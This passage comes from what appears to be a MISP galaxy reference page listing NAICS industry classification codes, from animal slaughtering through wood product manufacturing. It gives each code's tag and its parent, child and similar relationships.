  • parent-of: misp-galaxy:naics="311612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311615" with estimative-language:likelihood-probability="likely"

31161

Animal Slaughtering and Processing

The tag is: misp-galaxy:naics="31161"

31161 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311611

Animal (except Poultry) Slaughtering

The tag is: misp-galaxy:naics="311611"

311611 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311612

Meat Processed from Carcasses

The tag is: misp-galaxy:naics="311612"

311612 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311613

Rendering and Meat Byproduct Processing

The tag is: misp-galaxy:naics="311613"

311613 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311615

Poultry Processing

The tag is: misp-galaxy:naics="311615"

311615 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

3117

Seafood Product Preparation and Packaging

The tag is: misp-galaxy:naics="3117"

3117 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311710" with estimative-language:likelihood-probability="likely"

31171

Seafood Product Preparation and Packaging

The tag is: misp-galaxy:naics="31171"

31171 has relationships with:

  • child-of: misp-galaxy:naics="3117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311710" with estimative-language:likelihood-probability="likely"

311710

Seafood Product Preparation and Packaging

The tag is: misp-galaxy:naics="311710"

311710 has relationships with:

  • child-of: misp-galaxy:naics="3117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31171" with estimative-language:likelihood-probability="likely"

3118

Bakeries and Tortilla Manufacturing

The tag is: misp-galaxy:naics="3118"

3118 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31181" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31182" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311824" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31183" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311830" with estimative-language:likelihood-probability="likely"

31181

Bread and Bakery Product Manufacturing

The tag is: misp-galaxy:naics="31181"

31181 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311811

Retail Bakeries

The tag is: misp-galaxy:naics="311811"

311811 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311812

Commercial Bakeries

The tag is: misp-galaxy:naics="311812"

311812 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311813

Frozen Cakes, Pies, and Other Pastries Manufacturing

The tag is: misp-galaxy:naics="311813"

311813 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

31182

Cookie, Cracker, and Pasta Manufacturing

The tag is: misp-galaxy:naics="31182"

31182 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311821

Cookie and Cracker Manufacturing

The tag is: misp-galaxy:naics="311821"

311821 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311824

Dry Pasta, Dough, and Flour Mixes Manufacturing from Purchased Flour

The tag is: misp-galaxy:naics="311824"

311824 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

31183

Tortilla Manufacturing

The tag is: misp-galaxy:naics="31183"

31183 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311830" with estimative-language:likelihood-probability="likely"

311830

Tortilla Manufacturing

The tag is: misp-galaxy:naics="311830"

311830 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31183" with estimative-language:likelihood-probability="likely"

3119

Other Food Manufacturing

The tag is: misp-galaxy:naics="3119"

3119 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311919" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311941" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311942" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311999" with estimative-language:likelihood-probability="likely"

31191

Snack Food Manufacturing

The tag is: misp-galaxy:naics="31191"

31191 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311911

Roasted Nuts and Peanut Butter Manufacturing

The tag is: misp-galaxy:naics="311911"

311911 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311919

Other Snack Food Manufacturing

The tag is: misp-galaxy:naics="311919"

311919 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

31192

Coffee and Tea Manufacturing

The tag is: misp-galaxy:naics="31192"

31192 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311920" with estimative-language:likelihood-probability="likely"

311920

Coffee and Tea Manufacturing

The tag is: misp-galaxy:naics="311920"

311920 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31192" with estimative-language:likelihood-probability="likely"

31193

Flavoring Syrup and Concentrate Manufacturing

The tag is: misp-galaxy:naics="31193"

31193 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311930" with estimative-language:likelihood-probability="likely"

311930

Flavoring Syrup and Concentrate Manufacturing

The tag is: misp-galaxy:naics="311930"

311930 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31193" with estimative-language:likelihood-probability="likely"

31194

Seasoning and Dressing Manufacturing

The tag is: misp-galaxy:naics="31194"

31194 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311941

Mayonnaise, Dressing, and Other Prepared Sauce Manufacturing

The tag is: misp-galaxy:naics="311941"

311941 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311942

Spice and Extract Manufacturing

The tag is: misp-galaxy:naics="311942"

311942 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

31199

All Other Food Manufacturing

The tag is: misp-galaxy:naics="31199"

31199 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311991

Perishable Prepared Food Manufacturing

The tag is: misp-galaxy:naics="311991"

311991 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311999

All Other Miscellaneous Food Manufacturing

The tag is: misp-galaxy:naics="311999"

311999 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

312

Beverage and Tobacco Product Manufacturing

The tag is: misp-galaxy:naics="312"

312 has relationships with:

  • parent-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3122" with estimative-language:likelihood-probability="likely"

3121

Beverage Manufacturing

The tag is: misp-galaxy:naics="3121"

3121 has relationships with:

  • child-of: misp-galaxy:naics="312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312140" with estimative-language:likelihood-probability="likely"

31211

Soft Drink and Ice Manufacturing

The tag is: misp-galaxy:naics="31211"

31211 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

312111

Soft Drink Manufacturing

The tag is: misp-galaxy:naics="312111"

312111 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

312112

Bottled Water Manufacturing

The tag is: misp-galaxy:naics="312112"

312112 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

312113

Ice Manufacturing

The tag is: misp-galaxy:naics="312113"

312113 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

31212

Breweries

The tag is: misp-galaxy:naics="31212"

31212 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312120" with estimative-language:likelihood-probability="likely"

312120

Breweries

The tag is: misp-galaxy:naics="312120"

312120 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31212" with estimative-language:likelihood-probability="likely"

31213

Wineries

The tag is: misp-galaxy:naics="31213"

31213 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312130" with estimative-language:likelihood-probability="likely"

312130

Wineries

The tag is: misp-galaxy:naics="312130"

312130 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31213" with estimative-language:likelihood-probability="likely"

31214

Distilleries

The tag is: misp-galaxy:naics="31214"

31214 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312140" with estimative-language:likelihood-probability="likely"

312140

Distilleries

The tag is: misp-galaxy:naics="312140"

312140 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31214" with estimative-language:likelihood-probability="likely"

3122

Tobacco Manufacturing

The tag is: misp-galaxy:naics="3122"

3122 has relationships with:

  • child-of: misp-galaxy:naics="312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312230" with estimative-language:likelihood-probability="likely"

31223

Tobacco Manufacturing

The tag is: misp-galaxy:naics="31223"

31223 has relationships with:

  • child-of: misp-galaxy:naics="3122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312230" with estimative-language:likelihood-probability="likely"

312230

Tobacco Manufacturing

The tag is: misp-galaxy:naics="312230"

312230 has relationships with:

  • child-of: misp-galaxy:naics="3122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31223" with estimative-language:likelihood-probability="likely"

313

Textile Mills

The tag is: misp-galaxy:naics="313"

313 has relationships with:

  • parent-of: misp-galaxy:naics="3131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

3131

Fiber, Yarn, and Thread Mills

The tag is: misp-galaxy:naics="3131"

3131 has relationships with:

  • child-of: misp-galaxy:naics="313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313110" with estimative-language:likelihood-probability="likely"

31311

Fiber, Yarn, and Thread Mills

The tag is: misp-galaxy:naics="31311"

31311 has relationships with:

  • child-of: misp-galaxy:naics="3131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313110" with estimative-language:likelihood-probability="likely"

313110

Fiber, Yarn, and Thread Mills

The tag is: misp-galaxy:naics="313110"

313110 has relationships with:

  • child-of: misp-galaxy:naics="3131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31311" with estimative-language:likelihood-probability="likely"

3132

Fabric Mills

The tag is: misp-galaxy:naics="3132"

3132 has relationships with:

  • child-of: misp-galaxy:naics="313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313240" with estimative-language:likelihood-probability="likely"

31321

Broadwoven Fabric Mills

The tag is: misp-galaxy:naics="31321"

31321 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313210" with estimative-language:likelihood-probability="likely"

313210

Broadwoven Fabric Mills

The tag is: misp-galaxy:naics="313210"

313210 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31321" with estimative-language:likelihood-probability="likely"

31322

Narrow Fabric Mills and Schiffli Machine Embroidery

The tag is: misp-galaxy:naics="31322"

31322 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313220" with estimative-language:likelihood-probability="likely"

313220

Narrow Fabric Mills and Schiffli Machine Embroidery

The tag is: misp-galaxy:naics="313220"

313220 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31322" with estimative-language:likelihood-probability="likely"

31323

Nonwoven Fabric Mills

The tag is: misp-galaxy:naics="31323"

31323 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313230" with estimative-language:likelihood-probability="likely"

313230

Nonwoven Fabric Mills

The tag is: misp-galaxy:naics="313230"

313230 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31323" with estimative-language:likelihood-probability="likely"

31324

Knit Fabric Mills

The tag is: misp-galaxy:naics="31324"

31324 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313240" with estimative-language:likelihood-probability="likely"

313240

Knit Fabric Mills

The tag is: misp-galaxy:naics="313240"

313240 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31324" with estimative-language:likelihood-probability="likely"

3133

Textile and Fabric Finishing and Fabric Coating Mills

The tag is: misp-galaxy:naics="3133"

3133 has relationships with:

  • child-of: misp-galaxy:naics="313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313320" with estimative-language:likelihood-probability="likely"

31331

Textile and Fabric Finishing Mills

The tag is: misp-galaxy:naics="31331"

31331 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313310" with estimative-language:likelihood-probability="likely"

313310

Textile and Fabric Finishing Mills

The tag is: misp-galaxy:naics="313310"

313310 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31331" with estimative-language:likelihood-probability="likely"

31332

Fabric Coating Mills

The tag is: misp-galaxy:naics="31332"

31332 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313320" with estimative-language:likelihood-probability="likely"

313320

Fabric Coating Mills

The tag is: misp-galaxy:naics="313320"

313320 has relationships with:

  • child-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31332" with estimative-language:likelihood-probability="likely"

314

Textile Product Mills

The tag is: misp-galaxy:naics="314"

314 has relationships with:

  • parent-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

3141

Textile Furnishings Mills

The tag is: misp-galaxy:naics="3141"

3141 has relationships with:

  • child-of: misp-galaxy:naics="314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314120" with estimative-language:likelihood-probability="likely"

31411

Carpet and Rug Mills

The tag is: misp-galaxy:naics="31411"

31411 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="314110" with estimative-language:likelihood-probability="likely"

314110

Carpet and Rug Mills

The tag is: misp-galaxy:naics="314110"

314110 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31411" with estimative-language:likelihood-probability="likely"

31412

Curtain and Linen Mills

The tag is: misp-galaxy:naics="31412"

31412 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="314120" with estimative-language:likelihood-probability="likely"

314120

Curtain and Linen Mills

The tag is: misp-galaxy:naics="314120"

314120 has relationships with:

  • child-of: misp-galaxy:naics="3141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31412" with estimative-language:likelihood-probability="likely"

3149

Other Textile Product Mills

The tag is: misp-galaxy:naics="3149"

3149 has relationships with:

  • child-of: misp-galaxy:naics="314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31499" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="314999" with estimative-language:likelihood-probability="likely"

31491

Textile Bag and Canvas Mills

The tag is: misp-galaxy:naics="31491"

31491 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="314910" with estimative-language:likelihood-probability="likely"

314910

Textile Bag and Canvas Mills

The tag is: misp-galaxy:naics="314910"

314910 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31491" with estimative-language:likelihood-probability="likely"

31499

All Other Textile Product Mills

The tag is: misp-galaxy:naics="31499"

31499 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

314994

Rope, Cordage, Twine, Tire Cord, and Tire Fabric Mills

The tag is: misp-galaxy:naics="314994"

314994 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

314999

All Other Miscellaneous Textile Product Mills

The tag is: misp-galaxy:naics="314999"

314999 has relationships with:

  • child-of: misp-galaxy:naics="3149" with estimative-language:likelihood-probability="likely"

315

Apparel Manufacturing

The tag is: misp-galaxy:naics="315"

315 has relationships with:

  • parent-of: misp-galaxy:naics="3151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3159" with estimative-language:likelihood-probability="likely"

3151

Apparel Knitting Mills

The tag is: misp-galaxy:naics="3151"

3151 has relationships with:

  • child-of: misp-galaxy:naics="315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315120" with estimative-language:likelihood-probability="likely"

31512

Apparel Knitting Mills

The tag is: misp-galaxy:naics="31512"

31512 has relationships with:

  • child-of: misp-galaxy:naics="3151" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315120" with estimative-language:likelihood-probability="likely"

315120

Apparel Knitting Mills

The tag is: misp-galaxy:naics="315120"

315120 has relationships with:

  • child-of: misp-galaxy:naics="3151" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31512" with estimative-language:likelihood-probability="likely"

3152

Cut and Sew Apparel Manufacturing

The tag is: misp-galaxy:naics="3152"

3152 has relationships with:

  • child-of: misp-galaxy:naics="315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315250" with estimative-language:likelihood-probability="likely"

31521

Cut and Sew Apparel Contractors

The tag is: misp-galaxy:naics="31521"

31521 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315210" with estimative-language:likelihood-probability="likely"

315210

Cut and Sew Apparel Contractors

The tag is: misp-galaxy:naics="315210"

315210 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31521" with estimative-language:likelihood-probability="likely"

31525

Cut and Sew Apparel Manufacturing (except Contractors)

The tag is: misp-galaxy:naics="31525"

31525 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315250" with estimative-language:likelihood-probability="likely"

315250

Cut and Sew Apparel Manufacturing (except Contractors)

The tag is: misp-galaxy:naics="315250"

315250 has relationships with:

  • child-of: misp-galaxy:naics="3152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31525" with estimative-language:likelihood-probability="likely"

3159

Apparel Accessories and Other Apparel Manufacturing

The tag is: misp-galaxy:naics="3159"

3159 has relationships with:

  • child-of: misp-galaxy:naics="315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="315990" with estimative-language:likelihood-probability="likely"

31599

Apparel Accessories and Other Apparel Manufacturing

The tag is: misp-galaxy:naics="31599"

31599 has relationships with:

  • child-of: misp-galaxy:naics="3159" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="315990" with estimative-language:likelihood-probability="likely"

315990

Apparel Accessories and Other Apparel Manufacturing

The tag is: misp-galaxy:naics="315990"

315990 has relationships with:

  • child-of: misp-galaxy:naics="3159" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31599" with estimative-language:likelihood-probability="likely"

316

Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="316"

316 has relationships with:

  • parent-of: misp-galaxy:naics="3161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3169" with estimative-language:likelihood-probability="likely"

3161

Leather and Hide Tanning and Finishing

The tag is: misp-galaxy:naics="3161"

3161 has relationships with:

  • child-of: misp-galaxy:naics="316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="316110" with estimative-language:likelihood-probability="likely"

31611

Leather and Hide Tanning and Finishing

The tag is: misp-galaxy:naics="31611"

31611 has relationships with:

  • child-of: misp-galaxy:naics="3161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="316110" with estimative-language:likelihood-probability="likely"

316110

Leather and Hide Tanning and Finishing

The tag is: misp-galaxy:naics="316110"

316110 has relationships with:

  • child-of: misp-galaxy:naics="3161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31611" with estimative-language:likelihood-probability="likely"

3162

Footwear Manufacturing

The tag is: misp-galaxy:naics="3162"

3162 has relationships with:

  • child-of: misp-galaxy:naics="316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="316210" with estimative-language:likelihood-probability="likely"

31621

Footwear Manufacturing

The tag is: misp-galaxy:naics="31621"

31621 has relationships with:

  • child-of: misp-galaxy:naics="3162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="316210" with estimative-language:likelihood-probability="likely"

316210

Footwear Manufacturing

The tag is: misp-galaxy:naics="316210"

316210 has relationships with:

  • child-of: misp-galaxy:naics="3162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31621" with estimative-language:likelihood-probability="likely"

3169

Other Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="3169"

3169 has relationships with:

  • child-of: misp-galaxy:naics="316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31699" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="316990" with estimative-language:likelihood-probability="likely"

31699

Other Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="31699"

31699 has relationships with:

  • child-of: misp-galaxy:naics="3169" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="316990" with estimative-language:likelihood-probability="likely"

316990

Other Leather and Allied Product Manufacturing

The tag is: misp-galaxy:naics="316990"

316990 has relationships with:

  • child-of: misp-galaxy:naics="3169" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31699" with estimative-language:likelihood-probability="likely"

321

Wood Product Manufacturing

The tag is: misp-galaxy:naics="321"

321 has relationships with:

  • parent-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3219" with estimative-language:likelihood-probability="likely"

3211

Sawmills and Wood Preservation

The tag is: misp-galaxy:naics="3211"

3211 has relationships with:

  • child-of: misp-galaxy:naics="321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321114" with estimative-language:likelihood-probability="likely"

32111

Sawmills and Wood Preservation

The tag is: misp-galaxy:naics="32111"

32111 has relationships with:

  • child-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

321113

Sawmills

The tag is: misp-galaxy:naics="321113"

321113 has relationships with:

  • child-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

321114

Wood Preservation

The tag is: misp-galaxy:naics="321114"

321114 has relationships with:

  • child-of: misp-galaxy:naics="3211" with estimative-language:likelihood-probability="likely"

3212

Veneer, Plywood, and Engineered Wood Product Manufacturing

The tag is: misp-galaxy:naics="3212"

3212 has relationships with:

  • child-of: misp-galaxy:naics="321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="321219" with estimative-language:likelihood-probability="likely"

32121

Veneer, Plywood, and Engineered Wood Product Manufacturing

The tag is: misp-galaxy:naics="32121"

32121 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321211

Hardwood Veneer and Plywood Manufacturing

The tag is: misp-galaxy:naics="321211"

321211 has relationships with:

  • child-of: misp-galaxy:naics="3212" with estimative-language:likelihood-probability="likely"

321212

Softwood Veneer and Plywood Manufacturing

